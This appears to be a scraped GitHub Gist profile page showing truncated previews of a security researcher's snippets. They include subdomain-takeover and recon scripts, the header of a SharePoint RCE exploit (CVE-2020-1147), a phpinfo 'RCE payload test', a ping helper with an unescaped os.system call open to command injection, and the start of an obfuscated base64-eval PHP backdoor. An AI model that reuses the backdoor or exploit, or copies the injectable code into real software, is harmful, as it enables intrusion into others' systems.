Skip to content

Instantly share code, notes, and snippets.

Avatar
💀

0xcrypto

💀
View GitHub Profile
View takeover-server.py
import json, asyncio, pickle, os
from pathlib import Path
from takeover.takeover import takeover
home = str(Path.home())
# config is an dictionary. See ~/.config/takeover/config.json for structure
config = json.load(open(home + "/.config/takeover/config.json"))
# Do not forget to replace pointer to fingerprints with the valid data. See ~/.config/takeover/fingerprints.json for structure
View sdto.json
[
{
"service":"Acquia",
"status":"Vulnerable",
"cname":[
"acquia-test.co"
],
"fingerprint":"The site you are looking for could not be found."
},
{
View recon.sh
#!/usr/bin/env zsh
rm ~/bugbounty -rf
mkdir ~/bugbounty
cd ~/bugbounty
curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"
cat chaos-bugbounty-list.json | grep '"name"' | awk '{$1=$1};1' | sed 's/"name": "//g' | sed 's/"name":"//g' | sed 's/",//g' | while read folder; do mkdir -p $folder -v; done
for (( i=0; i < $(cat chaos-bugbounty-list.json | jq -r .programs | jq length); i++ ))
do
cat chaos-bugbounty-list.json | jq --arg i "$i" -r ".programs[($i | tonumber)].domains | .[]" > "$(cat chaos-bugbounty-list.json | jq --arg i "$i" -r '.programs[($i | tonumber)].name')/assets.txt" && echo -n "."
@0xcrypto
0xcrypto / CVE-2020-1147.py
Created Mar 18, 2021
SharePoint Authenticated (Low Privileged) RCE Exploit
View CVE-2020-1147.py
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
@0xcrypto
0xcrypto / bookmarklet.js
Last active Mar 17, 2021
Google Links Extractor (Extracts links from the visible page. Drag to bookmark bar to create a bookmarklet
View bookmarklet.js
javascript:alert((function() {links=[];document.querySelectorAll('.yuRUbf').forEach(function (e) {e.childNodes.forEach(function (f) {links.push(f.getAttribute('href'));});});return links;})().join("\n"))
@0xcrypto
0xcrypto / rce.php
Created Mar 9, 2021
RCE payload test
View rce.php
<?php
echo phpinfo();
exit()
?>
View multithreaded infinite ping.py
def ping(ip):
# database change value of ip to processing here
if(not os.system("ping %s" % ip)):
# database change value of ip to up here
return True
# database change value of ip to down here
return False
View keybase.md

Keybase proof

I hereby claim:

  • I am 0xcrypto on github.
  • I am 0xcrypto (https://keybase.io/0xcrypto) on keybase.
  • I have a public key whose fingerprint is 2D9E 1CD7 9F1B 0881 C087 34AB 9E68 4472 FF0C 51D4

To claim this, I am signing this object:

@0xcrypto
0xcrypto / License.php
Last active Apr 4, 2018
License.php backdoor in 799mlmscript.zip
View License.php
<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Tuesday, May 30th, 2017 at 22:29 UTC from IP 159.146.47.84
Checksum: ff73395f7b16ebacc0415646d7fe6909dd11f804
*/
$j71b376f="\142\141\x73\x65\x36\x34\137\x64\x65\143\157\144\145";@eval($j71b376f(
"Ly9OTitOOFUrVHFKdDFOd0pWSmRpdkdBbXVuUDcwUENXZFVrMUR0VGJQMEZ6L1pMTGgrbGVBK2FyUHRh
TzVoZGk5RjRLaFEzZUtkVkNXbWlrQUxQNk9URSt3OWN1SkZGWDlDWFpLNHRDYnhJMTdwY2lOQ0RyTDNlS
ElNWG1UVGZFWFBEaGFFM1l3RXhacHl5UmJqYmovdVRZdFJRZzhHZ3ZYeVk5a282THplcnJiVFhic0VTMD